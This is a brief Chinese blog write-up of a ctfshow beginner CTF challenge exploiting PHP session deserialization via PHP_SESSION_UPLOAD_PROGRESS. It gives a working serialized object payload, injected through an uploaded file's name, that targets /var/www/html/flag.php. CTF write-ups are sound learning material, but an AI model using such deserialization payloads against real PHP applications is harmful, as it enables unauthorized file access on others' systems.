• 欢迎光临~

ctfshow新手杯剪刀石头布(session反序列化)

开发技术 开发技术 2022-10-07 次浏览

看到ini_set('session.serialize_handler', 'php');让我不由自主的想起了session反序列化漏洞的一道题。直接百度会有很多文章这里不多介绍。

因此我们的解法就是:

1.post一个name为"PHP_SESSION_UPLOAD_PROGRESS" 的变量,值无所谓。

2.post上传一个文件,文件名改为我们的payload即可:|O:4:"Game":1:{s:3:"log";s:22:"/var/www/html/flag.php";}

 

程序员灯塔
转载请注明原文链接:ctfshow新手杯剪刀石头布(session反序列化)
喜欢 (0)